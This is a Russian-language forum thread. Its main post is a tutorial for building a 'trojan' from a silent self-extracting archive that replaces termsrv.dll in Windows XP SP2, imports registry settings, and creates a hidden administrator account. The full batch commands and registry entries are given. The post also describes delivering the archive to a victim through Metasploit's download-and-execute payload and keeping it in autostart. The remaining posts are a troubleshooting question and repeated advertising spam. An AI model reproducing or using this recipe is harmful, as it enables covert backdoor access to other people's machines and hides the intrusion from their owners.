+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 15

Тема: Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких)

  1. BestGuy

     

  2. #1

    По умолчанию Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких)

    Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких)

    Предисловие.

    Многие знают, что из WIN-XP можно сделать сервер терминалов и подключаться по сети к удалённому рабочему столу удалённо, работая в отдельной ссесии с графическим интерфейсом, при этом не отключая локального пользователя. То есть в итоге мы получаем возможность входа ещё одного пользователя в систему, только удалённого.

    ссылка по теме: http://www.xakep.ru/post/28531/default.asp
    В случае прямого доступа к компьютеру это сделать несложно, заменив одну dll (termsrv.dll), настроив политики безопасности, разрешив удалённый рабочий стол и т. д.

    Наша задача провернуть всё это удалённо, имея только cmd-шелл.



    1. Подготовка


    Нам потребуется сама termsrv.dll от старой версии (не помню какой бетты) 5.1.2600.2055 - такая у меня, прямые руки и мозги в голове.
    Обратимся к статейке (не помню кто автор, откопаю ссылку-выложу тут, позже):

    Все знают, что XP позволяет работать терминальной сессией (mstsc.exe), но при этом можно работать или локально или удаленно.
    А мы ХОЧИМ, как в серверных виндах! Не проблема:

    ...статья описывает возможность одновременной работы двух пользователей за компьютером с ОС Microsoft Windows XP SP2.
    В этом случае один из них работает за компьютером локально, то есть пользуется консольной сессией, а второй подключается
    по протоколу RDP (Remote Desktop Protocol - Удалённое подключение к рабочему столу). Данный механизм задействует Fast User Switching
    включается в <Управлении пользователями> в Контрольной панели) - это служба, которая предоставляет широко используемую возможность
    попеременной работы нескольких пользователей без завершения сеанса. Если Windows входит в домен, то Fast User Switching недоступна и,
    следовательно, одновременные пользовательские сесии тоже работать не будут. Эта функция планировалась для Windows XP Service Pack 2
    и присутствовала в бета-версиях SP2 вплоть до сборки 2055. Однако позже Microsoft решила, что жирновато будет включать фактически
    серверную функцию в ОС для рабочих станций, и начиная со сборки 2082 возможность одновременных подключений была отключена.

    Если взять TermSrv.dll от бета-версии Windows XP SP2 и заменить ею исходную, то функция двух одновременных сеансов становится вновь доступна.
    Для её включения требуется внести изменения в реестр при помощи прилагаемого key.reg.

    Процедура замены dll стандартна:

    делаем недоступным дистрибутив Windows (то есть вынимаем установочный CD из дисковода, отключаем/переименовываем сетевые ресурсы и так далее);
    переименовываем резервную копию файла, находящуюся в папке %WinDir%\System32\DLLCache;
    копируем туда новый файл;
    переименовываем рабочую копию файла в папке %WinDir%\System32;
    копируем на её место новый файл;
    отклоняем просьбу Windows File Protection предоставить доступ к дистрибутиву;
    соглашаемся держать в системе постороннюю версию файла;
    перезагружаемся.

    Наслаждайтесь, мои маленькие!


    2. Сборка трояна (down-patch`а)

    Итак приступим к сборке трояна от Meлкомягких:
    Ну вот, нужная инфа у нас есть. Используем обычный SFX-архив WinRAR, чтоб положить туда три файла:
    termsrv.dll - наша dll
    key.reg - файл настроек сервера терминалов
    run.cmd - сценарий, который сделает всё необходимое.
    Определимся с путём куда будет распаковываться наш архив. Я выбрал %WinDir%\Temp (есть у любой винды)
    Можно начинать писать файл run.cmd (ему мы передадим управление после распаковки SFX-архива)
    Заменить залоченную termsrv.dll, перезаписав её у нас не получится, но мы можем её переименовать!

    ren %SystemRoot%\system32\termsrv.dll termsrv.old - переименовываем оригинал
    Так же не забудем про то, что она может быть легко восстановлена службой System File Protection из dll - кэша, поэтому, заменим её и там (она не залочена) а в system32 уже можно скопировать под оригинальным именем.

    copy %SystemRoot%\temp\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll - копируем в dll-кэш
    copy %SystemRoot%\temp\termsrv.dll %SystemRoot%\system32\termsrv.dll - копируем в систем32
    далее:
    reg import key.reg - импортируем настройки из файла key.reg в реестр (о его содержании чуть ниже)
    del %SystemRoot%\system32\termsrv.old - пытаемся удалить старую dll (не получится - залочена)
    del %SystemRoot%\temp\termsrv.dll - удаляем за собой следы из Temp`a
    del %SystemRoot%\temp\key.reg - удаляем за собой следы из Temp`a
    net user asdf 1234 /add /expires:never /times:all - добавляем пользователя asdf, пароль 1234 (будем подключаться такой учёткой)
    net localgroup "Администраторы" asdf /add - делаем его админом (естественно "Администраторы" - должно быть набрано в DOS 866-кодировке)
    del %SystemRoot%\temp\run.cmd - удаляем этот исполненный сценарий.

    Готовим файл key.reg

    Берём нашу винду, запускаем regedit и экспортируем реестр. Далее делаем все настройки удалённого рабочего стола.
    а) разрешаем его: Свойства системы -> Удалённые сеансы -> Разрешить удалённый доступ к этому компьютеру. (ставим галку)
    б) разрешаем быстрое переключение пользователей: Учётные записи пользователей-> Изменение входа пользователей в систему ставим обе галки (использовать страницу приветствия, разрешить быстрое переключение пользователей)
    Кстати, надо сделать чтоб наш пользователь не отображался в этом приветствии, так как это сразу палево, поэтому сделаем его скрытым:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
    "asdf"=dword:00000000
    - не забудем добавить эту строку в наш key.reg (потом)
    Экспортируем реестр ещё раз, затем в TotalCommander сравниваем два файла реестра по содержимому, отслеживаем изменения и заносим их в блокнот.
    Сохраняем как файл key.reg
    Добавим туда (в начало) ещё то что, прилагалось в статье (настройка сервера терминалов и политики безопасности):

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
    "EnableConcurrentSessions"=dword:00000001

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "AllowMultipleTSSessions"=dword:00000001

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]
    "Options"=dword:00000000
    "Version"=dword:00010001
    "DSPath"="LocalGPO"
    "FileSysPath"="C:\\WINNT\\System32\\GroupPolic y\\M achine"
    "DisplayName"="Политика локальной группы"
    "Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]"
    "Link"="Local"
    "GPOName"="Политика локальной группы"
    "GPOLink"=dword:00000001
    "lParam"=dword:00000000
    И в конец строку, делающую нашего админа asdf невидимым в окне приглашения.

    То что у меня получилось (файл key.reg) , можно скачать тут (имхо его надо всё-таки почистить, много лишнего)

    Ну всё готово! Архивируем три файла (termsrv.dll, run.cmd, key.reg) WinRar`ом. Выставляем параметры:

    ;В комментарии ниже находятся команды SFX-сценария

    Path=.\%SystemRoot%\temp - каталог куда будет распаковано содержимое архива
    SavePath
    Setup=run.cmd - выполнить после распаковки
    Silent=1 - скрыть всё
    Overwrite=2 - перезаписывать существующие файлы
    Всё, наш троян готов! (Я обозвал SFX-архив terminal.exe)



    3. Впаривание трояна
    Используя пакет Metasplot Framework и уязвимости в Windows-XP вы можете попробовать обеспечить его загрузку (впаривание) с удалённого сервера и передачу ему управления. (полезная нагрузка win32_downloadexec)
    В общем как вы запустите его на компьютере жерты - это зависит от ваших знаний и везения.
    Один из способов описан мной в статье "Metasplot Framework часть 2 (или раздача троя)".


    Заключение.

    Вот так можно сделать downgrade системы Win-xp-sp2, превратив её в сервер терминалов. Конечно более-менее продвинутый пользователь заметит другого пользователя в системе, убьёт учётку, может сделать откат и т. д. Поэтому в серьёз данного трояна рассматривать не стоит. Кроме того dll ранней версии может быть заменена на новую при установке, добавлении компонентов из дистрибутива и т.д. Но в локалке такая переделка актуальна.
    Можно добавить его в автозагрузку - будет даунгрейдится каждый раз при запуске.
    Минус в том, что для вступления в силу изменений потребуется перезагрузка системы (можно добавить команду перезагрузки в run.cmd) и только потом будет возможно подключится к удалённому рабочему столу.


    P.S.Тут не рассмотренна проблема, которую может создать нестандартный файрвол при подключении к серверу терминалов. (у меня был и стандартный отключен)


    Автор статьи -=lebed=- за что ему огромное спасибо!

  3. #2

    По умолчанию

    проделал описанные выше процедуры, даже нашёл туже версию файла 5.1.2600.2055. Добавил строчку в реестр и установил ограничение подключений.
    Создал пользователя который состоит только в группе пользователей удаленного рабочего стола, сделал ему пароль. Но при попытке подключения выводится сообщение о том, что другой пользователь уже вошёл в систему и хочу ли я его выкинуть. При положительном ответе у него тоже появляется сообщение о том, хочет ли он вылететь.

    Короче - что я сделал не так?

  4. #3

    По умолчанию Fantastic! XRumer 7.0 Elite этолучшая программа для SEO! ;)

    XRumer 7.0 Elite это лучшая программа для SEO , продвижение и интернет-маркетинг

    Break a lot of captchas, autoconfirm emails, autoregistrate e-mail accounts on GMail and a more!



    Wanna CRACK OF XRUMER 7? Dont waste your time! Price of XRumer 7.0 Elite WILL GROW UP to $650 in september...
    Удачи!


    ------------------

  5. #4

    По умолчанию Хит 2011 года! Радиоуправляемые ЛЕТАЮЩИЕ рыбы!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube

    http://www.youtube.com/watch?v=vIJIN...layer_embedded
    У нас вы купите такую рыбку всего за 1550 рублей!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

  6. #5

    По умолчанию Радиоуправляемые ЛЕТАЮЩИЕ рыбы!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube
    http://www.youtube.com/watch?v=ksHL6...eature=related

    У нас вы купите такую рыбку всего за 1950 рублей!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

  7. #6

    По умолчанию Радиоуправляемые ЛЕТАЮЩИЕ рыбы! ХИТ 2011 ГОДА!!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube
    http://www.youtube.com/watch?v=ksHL6...eature=related

    У нас вы купите такую рыбку всего за 1950 рублей!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

  8. #7

    По умолчанию Радиоуправляемые ЛЕТАЮЩИЕ рыбы! ХИТ 2011 ГОДА!!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube
    http://www.youtube.com/watch?v=ksHL6...eature=related

    У нас вы купите такую рыбку всего за 1950 рублей!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

  9. #8

    По умолчанию СКИДКА 50% до конца марта! Радиоуправляемые ЛЕТАЮЩИЕ рыбы! ХИТ 2012 ГОДА!!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube
    http://www.youtube.com/watch?v=vIJINiK9azc

    У нас вы купите такую рыбку всего за 1179 рублей! Супер цена!!! Только до конца марта!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

  10. #9

    По умолчанию СКИДКА 50% до конца марта! Радиоуправляемые ЛЕТАЮЩИЕ рыбы! ХИТ 2012 ГОДА!!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube
    http://www.youtube.com/watch?v=vIJINiK9azc

    У нас вы купите такую рыбку всего за 1179 рублей! Супер цена!!! Только до конца марта!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

  11. #10

    По умолчанию СКИДКА 50% до конца марта! Радиоуправляемые ЛЕТАЮЩИЕ рыбы! ХИТ 2012 ГОДА!!

    Радиоуправляемая игрушка "Летающая рыба" по самым низким ценам в России.
    Лучший подарок на др, новый год, любой праздник. Смотрите видео на нашем сайте или на youtube
    http://www.youtube.com/watch?v=vIJINiK9azc

    У нас вы купите такую рыбку всего за 1179 рублей! Супер цена!!! Только до конца марта!


    http://www.flyingfishes.ru Ждем вас!

    +7 (495) 642-97-46, 604-41-67
    +7 (495) 504-60-26, 952-68-43

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Похожие темы

  1. Терминал Трейдера (Виртуальный сервер VPS/VDS) за ПОЛЦЕНЫ!
    от basetrading.net в разделе Торговля на Forex
    Ответов: 0
    Последнее сообщение: 25.09.2011, 09:27
  2. Терминал Трейдера (Виртуальный сервер VPS/VDS) за ПОЛЦЕНЫ!
    от basetrading.net в разделе Торговля на Forex
    Ответов: 1
    Последнее сообщение: 13.09.2011, 13:16
  3. Виртуальный Выделенный Сервер (VDS)
    от kiska8631 в разделе Хостинг
    Ответов: 8
    Последнее сообщение: 05.07.2010, 10:09

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения

зарегистрировать Ооо в москве, виды. . утилизация люминесцентных ламп Долгопрудный

санаторий бештау



1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50